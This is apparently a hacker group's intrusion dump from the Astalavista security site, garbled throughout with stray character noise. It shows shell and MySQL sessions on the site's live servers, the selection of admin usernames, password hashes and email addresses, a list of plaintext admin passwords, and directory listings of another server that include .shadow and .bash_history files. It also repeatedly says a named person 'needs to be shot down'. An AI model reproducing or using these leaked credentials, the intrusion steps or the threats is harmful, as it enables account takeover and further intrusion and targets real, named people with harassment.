<language>en-us</language># g8 p s8 H2 Y0 I w
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
8 r' h @. r) X5 b. J0 q <docs>http://blogs.law.harvard.edu/tech/rss</docs>! H8 x% G& P3 N% m$ D$ Q
<generator>Astalavista.com</generator>
0 R- ]5 l" s6 d2 U7 \1 @; C <webMaster>info@astalavista.com</webMaster>’ . $items . ‘7 Q* u8 {; Y- k3 |5 V: X+ _
</channel>! ]1 N1 Z0 D5 O( h7 X5 x: _; B
</rss>’;
! y7 m: ]8 h6 Y B! p T* s6 G
: G) e6 k2 M3 C/ _ if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) { n! t; L7 H' _. U4 p
unlink (FULLPATH . ‘/feed/exploits.xml’);* f( ?( Q5 e* x! M2 J
}1 d/ z6 `! j9 \2 U$ \& J, P" @2 ~
0 N; w6 M4 v' I# h+ V
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);( K( \4 g4 T, b ~5 T
[snip]4 _0 z0 _$ Y; g# G( f% ?. s
) F" s) R" M5 U6 P d. R
sh-3.2$ cat exploits.sh- v/ @1 p* e9 q; E+ H" v- X4 x
#!/bin/sh5 G o2 A5 o" U! c: b* G5 M. R/ k
5 w" y2 v; _" |) A4 I- j############################################################ m# m) v9 R S4 G* n6 f1 n) T
# #( p r! g( e; S3 W# v0 u
# Title: milw0rm exploits adder ## B9 R, y$ b7 Q' _$ l: m
# Description: Add all milw0rm exploits to the #
0 }7 V( o7 Y$ W7 {$ }1 [0 @9 J# Astalavista.com database #' G6 Q6 s$ O5 f0 s
# #/ }, G Y, d5 g9 X) A
# Company: Astalavista Group #( x% s4 O @. I( C% D+ `4 z/ F q5 J
# Author: Paulo M. Santos #
4 }; W6 @' f( Q# E-Mail: 链接标记paulo.santos@astalavista.ch #! S# z& j. z0 a: s% v6 K$ l3 f0 G
# #) Q7 Q* d. e: }9 L
###########################################################
3 ~+ P& R* J4 Y1 @9 C3 h7 G" {' y9 Y. ~1 I
# path9 I% d$ b( w% M
this_path=/home/com/public_html/modifications/cronjobs- E& \3 U2 Q! v( W8 v. g |( ]
6 m! v- F" v0 ?) y
# change directory) M: ]3 D; n' p* i) [) w
cd $this_path) Q& u# \7 b6 {- \2 O
cd tmp/
9 h3 E; N7 r' D7 L. o( C
* ~, p- E$ F* B# delete files$ l8 y8 k6 y; H: i7 [) P3 |9 i
rm -rf milw0rm.tar.* &( [" q- P- U* r3 H- s
rm -rf milw0rm/ &
' Q# n6 K+ J8 |5 L. b
$ P: F/ B- `, D% O: S/ `# wget milw0rm paket( F5 G2 E7 a8 z/ k) D; Y, D2 E
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]/ {6 b" Q# i3 ?! [7 r2 V: t7 ?% ?+ ^1 j
_/ \, e' \' z/ s# extract milw0rm paket* g) Q' l$ q' }! z
tar -xvf milw0rm.tar.bz2' q2 K5 L- S* i7 c9 ~. s
2 ?9 O7 c# N" S+ @! V
# change owner
0 W5 g3 ^7 U9 D* ~& Q% @+ jchown -R com .
5 b2 [' Z3 {# p# ]) R2 `# V0 }chgrp -R com .
; {3 }: e/ L, r! s: {. v/ }
. _4 ?0 t. \ S% s' U# execute php script, w: F3 Z: Q0 N
cd $this_path
$ Z% @6 s1 Y: F4 z% Sphp -q exploits.php9 N3 u, B4 ?1 |. y- ^+ T+ [
. `: c& l8 a% A) d& H A
# delete files
9 H2 h- b. v# frm -rf tmp/milw0rm.tar.*
+ u6 P4 S1 w4 r9 x4 Rrm -rf tmp/milw0rm/: l3 D5 I% O. b% \& K$ A$ c
/ v; L4 W* J U6 l5 S2 fsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
. Y' R4 s; f9 hPaulo M. Santos needs to be shot down.. k% [6 i) o# Q( ^1 o
/ L7 z/ |2 S# C8 v6 Q$ Lmysql -u contrexxuser2 -p
; f) A: U$ a2 w$ {+ HEnter password:& S8 |5 N3 r3 f$ W4 t+ t+ c8 y! G
Welcome to the MySQL monitor. Commands end with ; or \g.
% o- H$ @5 O. tYour MySQL connection id is 2616943 u7 ^$ E) Q5 @8 M
Server version: 5.0.45-community-log MySQL Community Edition (GPL)5 K# f! c* R, }5 t+ Z& Q: g# j+ A
' r& F% C5 s8 c- J5 r
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.; u7 I3 S& e1 m, ?
+ v9 T9 ?- T4 u! E0 omysql> show databases;6 }2 l4 W+ R5 ]9 F9 \
+——————–+
2 w8 i/ y% X/ W6 h5 M) c! ?0 g9 e| Database |. L7 j4 i7 f) T, L2 I
+——————–+
6 c, D( {/ ^* A% }* ]| information_schema |6 [/ {6 y/ F0 X, s% e9 P
| com_contrexx2 |
: S8 ]- G# Q* M* X+ I O `- J| com_contrexx2_live |
# }+ H6 \/ E5 x: Y# K& [| test |1 d3 B. s* x* ~4 e- ?( ^; m1 W
+——————–+5 w' I# q0 l$ \7 U8 ^4 n! d
4 rows in set (0.00 sec). ^5 _& g$ k$ z+ y) F
+ X/ I1 i. c' ]" E2 @
mysql> use com_contrexx2_live
) a3 z- P% X1 IDatabase changed3 {8 E! }6 o7 \/ [9 K9 y
mysql> show tables;0 {+ [3 O4 L( Y- u, L
+————————————————–+
! g2 f! V% P8 }* x9 ]/ u' w1 ]- `# x| Tables_in_com_contrexx2_live |
; {4 @& z( B: u. g+————————————————–+- j0 W# F1 C4 N( y
| cc_banner_counter |+ T5 H q- ~: p2 K, `4 g
| cc_search_counter |
' _4 ?; E0 C5 u1 a# \| contrexx_access_group_dynamic_ids |
8 h0 O" D% c) e4 `. N| contrexx_access_group_static_ids |
- e7 v. v1 t( P4 o! W) \7 U| contrexx_access_rel_user_group |3 Z, L5 B& B7 d3 y6 E) b7 m
| contrexx_access_settings |/ v- n1 B& s, S) U
| contrexx_access_user_attribute |
9 D; p$ A0 m) e; u$ ]+ p| contrexx_access_user_attribute_name |* }+ |) w. B- y7 B
| contrexx_access_user_attribute_value |
$ B2 I$ R! C+ I0 b9 N' C| contrexx_access_user_core_attribute |& d; e6 Z/ B# C$ n3 p1 `+ S
| contrexx_access_user_groups |' i6 t% |! G% f) D0 |
| contrexx_access_user_mail |0 Z( b( z2 [+ h8 \ V
| contrexx_access_user_profile |
Y. d$ s" ]2 r0 A8 M4 J# D5 x| contrexx_access_user_title |# g: z- Q( A! [7 ^2 K) Y, C) D
| contrexx_access_user_validity |
{% E. ^ \5 j# U| contrexx_access_users |
2 C' f2 F' z9 O: @: i| contrexx_backend_areas |% r4 ]7 b! U- [' @; Z: ^6 ^- n+ o- Z
| contrexx_backups |, U3 Z" m8 m7 r+ \& z4 B9 [6 K( m
| contrexx_content |4 t- E v$ V8 L4 b
| contrexx_content_history |5 ]9 U- ]& O# X7 }
| contrexx_content_logfile |
% c5 W# ]$ i: x: U1 q5 D| contrexx_content_navigation |
* Y: N8 P6 H! x% Z' b( L| contrexx_content_navigation_history |2 b1 F7 A" i: b+ @ q9 p$ h) j
| contrexx_ids |: X, G/ n9 Q. \9 ~7 U% d
| contrexx_languages |" K: |) `# y: L C- X- `0 y" [
| contrexx_lib_country |/ t+ I" b& u) X2 M/ L- k# N
| contrexx_log |
y* Q/ `9 ], \) [| contrexx_module_alias_source |
% F8 |# Y* x7 l- M, M| contrexx_module_alias_target |
9 u8 X5 r/ \1 B3 \5 ]9 }| contrexx_module_block_blocks |
" h" O& e: x, E4 r| contrexx_module_block_rel_lang |; ]& L/ b9 p% B6 Z
| contrexx_module_block_rel_pages |
; D. T1 b' G$ V5 `* v% l! t| contrexx_module_block_settings |' U: p3 I( Y# {" j0 M
| contrexx_module_blog_categories |9 S% e) w1 c+ @0 H8 C7 n
| contrexx_module_blog_comments |3 _+ }2 V' p: ^4 A; g0 ]2 x
| contrexx_module_blog_message_to_category |# g$ k% M/ v$ g4 Q3 A; m: P
| contrexx_module_blog_messages |
" D, Q4 U; @+ r( E8 V6 z$ M& u| contrexx_module_blog_messages_lang |
) o) @% ^7 T' O; m' p| contrexx_module_blog_networks |/ v& X" V2 J5 g6 \: s- l
| contrexx_module_blog_networks_lang |
* M) C- t! h: y& e5 @, Q. t9 \| contrexx_module_blog_settings |, K8 r l$ b- C
| contrexx_module_blog_votes |# C) i) K: T) f' X+ Z
| contrexx_module_calendar |
0 Y6 }4 F- e$ v( T% g& S5 X: G| contrexx_module_calendar_access |
; ]; H) @5 C5 N; U7 J3 x| contrexx_module_calendar_categories |
8 q) p: | y7 n R| contrexx_module_calendar_form_data |4 B& E0 m- X4 f$ n; Z
| contrexx_module_calendar_form_fields |1 Y/ @; j; j+ g4 |$ I: f' a' M
| contrexx_module_calendar_registrations |" `; a3 w7 o2 C. I1 n7 ]' j
| contrexx_module_calendar_settings |
' J6 R* p8 G9 i9 B8 G& u+ _| contrexx_module_calendar_style |. F6 ^7 V& C4 s+ I; k! P. Y
| contrexx_module_contact_form |5 F5 ?; N, Y/ x' p$ n
| contrexx_module_contact_form_data |
' U1 T( @2 X+ N+ c| contrexx_module_contact_form_field |
! ]0 z: ~: s3 F1 i8 S1 K2 X& Z| contrexx_module_contact_settings |5 c$ k. u7 i* h0 `- l
| contrexx_module_data_categories |
5 b$ H5 b& h1 ~* x| contrexx_module_data_message_to_category |1 P+ a2 l5 w: N2 [3 G
| contrexx_module_data_messages |( q( D0 [1 I! @7 A2 o) Q% r9 i
| contrexx_module_data_messages_lang |
- B6 ?% Q7 v# s| contrexx_module_data_placeholders |" q5 \: h& u1 [" l' ?7 N
| contrexx_module_data_settings |
! ?! z. |+ c! e9 F8 w {% J, S| contrexx_module_directory_access |0 v+ W) w: k+ M: O. S
| contrexx_module_directory_categories |
0 t& _8 N% k$ A; g% Z3 ^| contrexx_module_directory_dir |7 p: Z: D& q& ~
| contrexx_module_directory_inputfields |9 T! F: }7 s* [* C0 q
| contrexx_module_directory_levels |
/ c0 q7 Q4 p# g! R0 y4 N: N| contrexx_module_directory_mail |/ F. C* \& y! _7 [' ]3 t# |
| contrexx_module_directory_rel_dir_cat |
* F5 }5 t1 a, N! l2 n: u6 A| contrexx_module_directory_rel_dir_level |' u }8 J! o" T8 _% M0 W! w# e
| contrexx_module_directory_settings |
, T1 I( z4 p! |9 g( H+ b( H| contrexx_module_directory_settings_google |
! L7 P b: r( I0 x7 V+ C5 n6 c| contrexx_module_directory_vote |% n7 E% S* Y5 G' C
| contrexx_module_docsys |; C. A" @2 q- J
| contrexx_module_docsys_categories |- ^- E) `- P5 ]( H2 z) K0 P
| contrexx_module_egov_configuration |
$ {* \+ V+ _# T% I% c/ a: s* J| contrexx_module_egov_orders |
. g9 q6 N8 X" R* e) \| contrexx_module_egov_product_calendar |
0 W: Y- R- H& y| contrexx_module_egov_product_fields |
e4 @1 [* k; C, ]| contrexx_module_egov_products |
. J; f3 j8 Z& x; D| contrexx_module_egov_settings |4 Y1 y& G1 K; t1 G M
| contrexx_module_exploits |
2 ^1 L: L) Q0 p, e6 N| contrexx_module_exploits_categories |
3 G3 { d' p7 i: h7 U3 H9 r| contrexx_module_feed_category |
4 v- R6 W9 c2 C4 v# d1 }6 o% k| contrexx_module_feed_news |
) e$ h7 i& ~- A" e| contrexx_module_feed_newsml_association |
% K j1 y& v x4 v6 B; K& x1 N3 U| contrexx_module_feed_newsml_categories |: o! u9 }3 x2 |! h1 @! m( f
| contrexx_module_feed_newsml_documents |' ~" }1 E8 J0 b$ X' t' n
| contrexx_module_feed_newsml_providers |. J. I/ m) G) N5 l/ y' K4 Z
| contrexx_module_forum_access |
/ Q: v; ^& c& O1 [4 V| contrexx_module_forum_categories |1 M [2 [# q1 W
| contrexx_module_forum_categories_lang |- Z. l, R+ L) L
| contrexx_module_forum_notification |
) X- y7 B+ u/ Y$ N( [| contrexx_module_forum_postings |
9 q+ `6 r( c. }; c; ~| contrexx_module_forum_rating |1 A" e) C8 ^! ]2 H0 K" Z
| contrexx_module_forum_settings |% `- E9 F& \( B. |) I
| contrexx_module_forum_statistics |
( N2 c( E f. T1 E! I- Y4 p3 L2 ]) w) x| contrexx_module_gallery_categories |
* [! ?) e' D5 o) b8 Q7 @| contrexx_module_gallery_comments |0 Y* w; ~/ d9 x7 U0 v, t
| contrexx_module_gallery_language |. X5 @4 C, ~) s0 B3 W
| contrexx_module_gallery_language_pics |- F0 D+ b( l/ U5 H6 d- u
| contrexx_module_gallery_pictures |
, k5 a* S' r/ r( i| contrexx_module_gallery_settings |
! P8 U- {( C r6 s9 b/ e5 C| contrexx_module_gallery_votes |' l+ G( Q4 k, s; O
| contrexx_module_guestbook |
# u/ p1 u8 y# X1 l: e B* h. A6 C3 w% o| contrexx_module_guestbook_settings |% v( V8 j" {2 O! _
| contrexx_module_livecam |# P) T7 G) c9 S" D4 r7 V2 M* w8 }
| contrexx_module_livecam_settings | W' F& D- e% k( [6 G1 `
| contrexx_module_market |
, ^/ b# T+ F! G* u+ p| contrexx_module_market_access |0 _% S, [8 l0 n8 A. y
| contrexx_module_market_categories |
& l5 P8 y5 E/ h' r7 ?8 _| contrexx_module_market_mail |
0 M k$ U% Y8 _| contrexx_module_market_paypal |
% f3 c) ~2 W5 | @: z8 ]6 X" x7 U| contrexx_module_market_settings |
* Z$ {4 p0 C8 N8 x/ m| contrexx_module_market_spez_fields |1 u H" w) ]5 E) K5 W6 X! L
| contrexx_module_mediadir_access |
% e0 \$ B ?" X6 ~# @2 x| contrexx_module_mediadir_categories |
8 k I2 r/ z' h/ a+ f, j| contrexx_module_mediadir_comments |
. s1 J, s0 f- K7 ]( h: B4 @( _| contrexx_module_mediadir_dir |
8 Z+ [( a1 W' M| contrexx_module_mediadir_inputfields |) A; }+ \3 ~* h' H3 a
| contrexx_module_mediadir_levels |' [8 V6 @0 O9 V2 B! t0 {
| contrexx_module_mediadir_mail | a7 ^0 @5 v& o4 j, }
| contrexx_module_mediadir_rel_dir_cat |% k" h1 s8 Z! s. Q& Z+ z
| contrexx_module_mediadir_rel_dir_level |
) B1 k- Y6 g2 L. d| contrexx_module_mediadir_reports |
) k2 j5 W d; u# {| contrexx_module_mediadir_settings |
& I6 X/ w' C* L- w| contrexx_module_mediadir_settings_google |
! R' \9 X2 I0 a6 T1 c! O| contrexx_module_mediadir_vote |) Y9 M3 h, C& \
| contrexx_module_memberdir_directories |" C3 y! `$ O1 t
| contrexx_module_memberdir_name |
/ G' {' n) m% }! @: ^| contrexx_module_memberdir_settings |( z5 K) J5 K/ A4 ?6 P4 `/ f4 |
| contrexx_module_memberdir_values |" P W3 |0 A2 {' h6 a8 U" d
| contrexx_module_nettools_allowed_groups |
- t- c' V* L% K: ^| contrexx_module_nettools_settings |. R2 Q/ r6 F) V$ V: O. G' ^$ g$ N4 u
| contrexx_module_news |
' U# ?% p7 N: ~2 z* ^8 R0 R' a| contrexx_module_news_access |7 Z3 E1 Y) H* _; e
| contrexx_module_news_categories |
9 }' R8 f# O8 ^| contrexx_module_news_settings |) O3 i; t& a: Q7 h% F% Z
| contrexx_module_news_teaser_frame |
- m" Z# K. D# E# I, l| contrexx_module_news_teaser_frame_templates |
, }' @/ {7 k, n) [, a| contrexx_module_news_ticker |( f4 B* m4 ?- G! E
| contrexx_module_newsletter |
# v) K8 R' v/ y. K, p| contrexx_module_newsletter_attachment | P# S; D) M' Q! L& `. H
| contrexx_module_newsletter_category |
. d/ t! Y- S& Q| contrexx_module_newsletter_confirm_mail |
( ^0 d! X+ H; B, T2 L2 `| contrexx_module_newsletter_rel_cat_news |9 B$ ` [; x4 n
| contrexx_module_newsletter_rel_user_cat |6 r# r' e$ J8 o4 q4 |, L
| contrexx_module_newsletter_settings |7 _' t, T, x' V
| contrexx_module_newsletter_template |
7 @) a7 m6 Z6 `| contrexx_module_newsletter_tmp_sending |
6 y! W, g8 P9 h; f2 c& {4 p; u| contrexx_module_newsletter_user |3 _7 e$ i& o" K
| contrexx_module_newsletter_user_title |
, B4 n; G5 Q2 v- C g: ?| contrexx_module_onlinetools_defaultports |
" d% s T- E* m8 k| contrexx_module_onlinetools_defaultports_back |
3 V/ Y3 d8 b$ ^8 f9 b9 x6 P| contrexx_module_onlinetools_geolitecity_blocks |9 O6 f/ n8 {- |1 [$ r- O& R$ G
| contrexx_module_onlinetools_geolitecity_country |$ n" a) [3 N2 Y {5 @
| contrexx_module_onlinetools_geolitecity_location |& V; G$ I7 q8 \) p
| contrexx_module_podcast_category |
( m8 u" A4 ?. j3 }2 t! i| contrexx_module_podcast_medium |
4 C8 p3 |/ G, E| contrexx_module_podcast_rel_category_lang |
' b4 R1 }6 e" i5 h| contrexx_module_podcast_rel_medium_category |: W% `' j; I" g: B% g2 s
| contrexx_module_podcast_settings |5 K t: @+ Z+ y3 m* t
| contrexx_module_podcast_template |( J2 P$ E2 ~/ N
| contrexx_module_proxydb |
. n) M# [1 A q% `% h) h$ H| contrexx_module_recommend |
1 h5 o$ h0 z. G! m; N| contrexx_module_repository |
( p# g; N- _' Q `1 X| contrexx_module_securitynews_cats |
! F9 s6 \5 ]0 I; }) T/ z& `, Y* y| contrexx_module_securitynews_feeds |
; x" @4 n% l/ J9 m9 r' {1 E% b| contrexx_module_securitynews_news |. i0 d4 {6 y: w4 i! }7 A/ _5 ?
| contrexx_module_shop_categories |
' M% E% ?- J# z3 y7 t) j Q| contrexx_module_shop_config |
! B! S, H8 P9 l) m" |: v| contrexx_module_shop_countries |
7 Y7 y5 ?5 X' z3 ^# k) T| contrexx_module_shop_currencies |
0 g0 {$ n) Y( C| contrexx_module_shop_customers |
- i2 X1 j0 B- n+ f| contrexx_module_shop_importimg |
V6 h- g( ]# a; r' _ D| contrexx_module_shop_lsv |
3 e4 X7 f4 w: l# @- R: L| contrexx_module_shop_mail |
3 T u9 j4 [' G! v9 j| contrexx_module_shop_mail_content |
) a. ^; T( O; p, p" D| contrexx_module_shop_manufacturer |
, f8 E: m7 L$ E| contrexx_module_shop_order_items |
6 E" W7 T/ j+ W5 w* T& Z, z& n6 I4 c| contrexx_module_shop_order_items_attributes |
8 s# U8 D+ }6 Q4 f| contrexx_module_shop_orders |$ R3 ^% W% s5 \4 q$ E, p
| contrexx_module_shop_payment |
- N* a. ]& e/ C/ }% O- ]' s| contrexx_module_shop_payment_processors |9 u# u" k* k' ~) D/ A c
| contrexx_module_shop_pricelists |( z3 G$ i! b9 x1 {% `0 ~
| contrexx_module_shop_products |
6 J8 i. I: A7 q' b9 `| contrexx_module_shop_products_attributes |
! U: Y( W/ N7 `* Q* F2 L+ a+ B| contrexx_module_shop_products_attributes_name |
* z( L5 K9 j: j5 H* }1 B| contrexx_module_shop_products_attributes_value |8 s' m+ ]/ ?- y6 g' O/ i
| contrexx_module_shop_products_downloads |
1 B- D8 u/ R/ }* E0 ~ [) k, b; b2 K| contrexx_module_shop_rel_countries |
% g6 W0 b; b* _# O( k4 Y| contrexx_module_shop_rel_payment |4 u/ d. W; N$ P' `5 K
| contrexx_module_shop_rel_shipment |2 _7 h4 O y- m
| contrexx_module_shop_shipment_cost |
d. n5 \# N- U8 b0 c" m| contrexx_module_shop_shipper |
9 M" _+ @4 i: X; ^| contrexx_module_shop_vat |
& n: v4 {+ [& R' X| contrexx_module_shop_zones |
A. C$ V* t4 ~2 M Y, n# j6 @2 D! E| contrexx_module_u2u_address_list |* y \9 ^4 s f1 P& _6 N4 f
| contrexx_module_u2u_message_log |+ X; p1 r) n0 k+ Z3 F' C z
| contrexx_module_u2u_sent_messages |0 t) T, K P' a- S
| contrexx_module_u2u_settings |
- `' ^2 y5 D, R. Q3 ^| contrexx_module_u2u_user_log |
% o& Q4 z2 ]4 ]+ W3 G- r9 W| contrexx_modules |
. c) A. i# D" Z+ @# i| contrexx_sessions |, U4 ?4 f; K3 ?
| contrexx_settings |
8 z% K. P2 k; e0 V p5 m| contrexx_settings_smtp |; ?% K5 b8 k: ?' O3 r. @
| contrexx_skins |/ j U3 x/ p$ ]
| contrexx_stats_browser |
$ M5 _) r# ^* {4 Y5 ]| contrexx_stats_colourdepth |
$ L: f6 q) v2 Y" I! N3 w# H8 Z| contrexx_stats_config |
% H2 F5 b7 K) C- E" l3 i- U) J3 s' ^| contrexx_stats_country |5 K5 U" ^- v5 o$ L3 U- q
| contrexx_stats_hostname |( P' |& i% a6 l5 Z
| contrexx_stats_javascript |
6 W3 `/ j! ^5 W2 ^| contrexx_stats_operatingsystem |
! g n% \$ i M# f- Y. |) a; N| contrexx_stats_referer |6 p$ ~) {# B& L3 m% B% a, }2 w
| contrexx_stats_requests |
- o- U- X/ D4 ]5 B2 L1 P| contrexx_stats_requests_summary |2 {# Y u7 n4 c+ z5 X
| contrexx_stats_screenresolution |8 f1 A: x; T5 W' P& M
| contrexx_stats_search |/ f3 s- l. @# j- w
| contrexx_stats_spiders |: w3 v7 w+ b5 \* o6 n$ U4 b
| contrexx_stats_spiders_summary |
j' ]) y9 X+ C( ?| contrexx_stats_visitors |
q+ p- u( V- K" V- m- F| contrexx_stats_visitors_summary |/ H7 S* H* G, j6 h( }
| contrexx_voting_additionaldata |. F0 E8 p4 _* y7 B
| contrexx_voting_email |8 a4 B1 t; P+ m# K) z8 Z( R
| contrexx_voting_rel_email_system |- ?; R9 X# ?8 O2 P) h4 S% D( o+ `
| contrexx_voting_results |0 q* h9 e" y% G! ~4 D. I2 i
| contrexx_voting_system |, s1 l, y# d+ h. [6 F* n# V
| foo |
4 m+ W1 }6 v: F& P+————————————————–+0 \! }+ P, \2 @5 \
227 rows in set (0.01 sec)" Z6 q+ t8 f4 `9 T$ J, N" b$ B1 @
2 t0 X0 v: i5 h8 C ?3 k% r$ ~
mysql> select count(*) as skids from contrexx_access_users;
+ B! q. F }3 A+ @6 Q% R+——-+, e. a8 M8 e; X) B
| skids |3 [ J* E/ W5 p+ G/ ^2 x2 _
+——-+
, e) s* H" z! d5 j- v6 m$ J* o| 53699 |
$ \ y) J: S) @* `' `7 H9 ?& W+——-+
& ]% X3 n% o$ c1 row in set (0.00 sec)& \* S" d3 v; C ~2 s) e
9 s/ y! J4 g. `& |mysql> describe contrexx_access_users;$ t S- m# B1 P7 l0 I: H
+——————+——————————————+——+—–+————–+—————-+
- [5 Y! O+ s: c- K: U% T8 |) n| Field | Type | Null | Key | Default | Extra |
2 Y& z8 w! g& K1 n+——————+——————————————+——+—–+————–+—————-+
' [/ t& Z3 q8 ?" F6 F2 O% ^8 J$ y* K| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
: \ ?! I: d! I2 o+ X" h7 }| is_admin | tinyint(1) unsigned | NO | | 0 | |# M0 F" [3 U1 e! r
| username | varchar(40) | YES | MUL | NULL | |
% R3 S% \& q" q2 y4 U C( e| password | varchar(32) | YES | | NULL | |
: K7 }% ~ z; G| regdate | int(14) unsigned | NO | | 0 | |6 k( U+ f9 }! _% o" ^5 Y6 r
| expiration | int(14) unsigned | NO | | 0 | |
4 V5 E$ H3 S* z| validity | int(10) unsigned | NO | | 0 | | ?. Z& y" u) v: z% Q8 U, v
| last_auth | int(14) unsigned | NO | | 0 | |
6 a2 [: H* O7 Y0 i, s$ }| last_activity | int(14) unsigned | NO | | 0 | |5 [1 K5 H$ ]: `* P
| email | varchar(255) | YES | | NULL | |
* M3 |- W/ p1 c8 V4 G| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
$ b- y& Q5 Q& t- f! E! x2 a| frontend_lang_id | int(2) unsigned | NO | | 0 | |# X7 `7 O6 l4 j0 y; D; e% ?, i
| backend_lang_id | int(2) unsigned | NO | | 0 | |
, F, |' y/ w- D% C# ]7 _ o: h9 t5 T| active | tinyint(1) | NO | | 0 | |
( M1 G1 P; N* `5 Z: k# B| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
0 P2 F% d, i8 W7 ^| restore_key | varchar(32) | NO | | | |
' \( v1 P( i3 f| restore_key_time | int(14) unsigned | NO | | 0 | |
; |# X. F3 _ r, b T| u2u_active | enum(’0′,’1′) | NO | | 1 | |4 V- D4 B/ ?; L8 Z. ^1 z
+——————+——————————————+——+—–+————–+—————-+
6 x* W( D) l' s18 rows in set (0.00 sec)8 z: M: @% J7 m
( o" |- }* ^( c3 _" M4 c
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
/ ?: @) t+ q l6 A+————+———————————-+—————————–+
$ N% E1 j: t. ~| username | password | email |
$ C7 n! ~8 p2 v. o+ K; |! U# d+————+———————————-+—————————–+3 }& m; H( b5 y$ s, ]
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
8 K$ q6 J$ L5 _' ^/ ?| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |/ a- d4 h. I% R
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |! J; ?: H2 S# b+ x2 t: L {2 n2 F
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
% [& J+ H; p& v5 L9 e; o8 \2 q! h1 y7 J+————+———————————-+—————————–+9 ~1 o+ k/ S) p# S; l9 E
4 rows in set (0.04 sec)
' T3 j, ] i. O
4 {+ a/ c% I2 }$ B- hmysql> exit;
5 Q1 P; g: w7 B) c3 I9 J rBye2 v6 J( J6 a8 g4 z' {
$ a) Q: L9 o% O6 G' x
[~] There you go, your “team of security and IT professionals” is a joke.
( I. @& x' f* M0 ]/ V9 [! b+ v2 g3 a- l) K, L2 ^4 V' ]
+——————————+) P! T$ d* u5 `% b) K
system:f82BN3+_*
) z6 {/ i0 C. a4 h% qBe1er0ph0r:belerophor4astacom
) g: {9 ]7 C# a9 {- pprozac:asta4cms!; H1 ^, H5 e4 i( s3 c( n
commander:mpbdaagf6m
+ B& [" u3 h2 i4 g U, Lsykadul:ak29eral6 ? n- D' a/ B3 N$ d* K
+——————————+
; K" S. n3 R8 s$ u' p* K6 Y6 {
: P: G5 a3 q3 Z: s[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
8 O1 L' Q/ v# o; R; I& P! p1 S…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.% x# E* T! F( t2 n l8 ?* [8 c
1 Z0 \: J; B3 l4 G+ @9 L" J8 n* F
[~] Lets move to astalavista.net now,
$ j7 G* _& D4 ]6 V
) J. r" V% x& Z" }From <链接标记[url]https://www.astalavista.net/[/url]>:4 I3 s# b# [/ Q7 V( p- `
>> Everyone knows that the best defense is a good offense.
, T* G: [; R Z" H>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.1 E+ h4 S6 B0 Q5 N
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
' L0 V% c+ x( `/ z m>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”" Z2 f7 H9 j9 s7 k
) \) h0 y. E& X$ F
>> Go ahead, try and hack our server . in a completely legal way!
; B6 r" b& A3 B& j( e( i- h>> Learn by doing: We offer our members tricky tasks and challenges on an
4 ?4 ~$ I& l+ x' H: e>> ongoing basis so you can test your knowledge and abilities. You can also& ^8 Q5 ?( |3 u2 d; z" n8 ?9 U/ o
>> demonstrate what you.ve mastered by taking part in regular hacker contests
( b. \3 u7 G4 T, ^7 R7 C/ c% a2 N( G>> and war games
9 e% j( J: [& _9 A3 N9 v# i i
2 H, `, p& ^8 ~# q[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
5 @$ t z9 k: z7 [- r
9 H6 T1 k3 v' a& r& [7 x; i) e) U- G[-] Tricky task: Find home dir of astalavista.net" g, e6 A/ L: E: }' M$ w
# N/ V* D! e" N& o2 D8 C
sh-3.2$ ls -la ~astanet
$ X& p; p* Q G# }' `) dtotal 48% V! T4 L, D, K* ?2 A: Z
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
% y# c! \- ~* E) Y/ edrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
; E6 E* c& N% w2 v. O3 Udrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth6 V7 x$ n8 a0 W: G1 T& D& i# L
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history# c. G. R, K5 H2 x5 b3 m3 U% Z
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout5 a: |, E/ E& w' d& _" @
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile5 p8 @, p: ]2 z; G5 @# r
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
- |" n+ G1 w/ Udrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
' q9 I9 |1 B# p+ y! h' ~/ ~drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap% i9 J7 F+ l7 ~" \* ~6 ?+ N' s) Z- F
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
! e! z* L3 x1 _3 T7 klrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
+ T( N3 Y7 o1 y-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
6 D r O" V; {4 n% Z; c
' [. g# \* M" p0 n0 Q }, B, d1 vsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
' Q7 g* ]3 |4 jsh-3.2$ ls -la
& _" k B6 s" C, W2 `. Btotal 200" M5 A0 T: t( m9 f( A# ~
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .7 _6 @8 l7 A3 c, L8 l! d
drwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
+ g3 ^- m$ i! N) qdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007( J. o+ L# X1 K1 R0 K# D# Z2 B! M
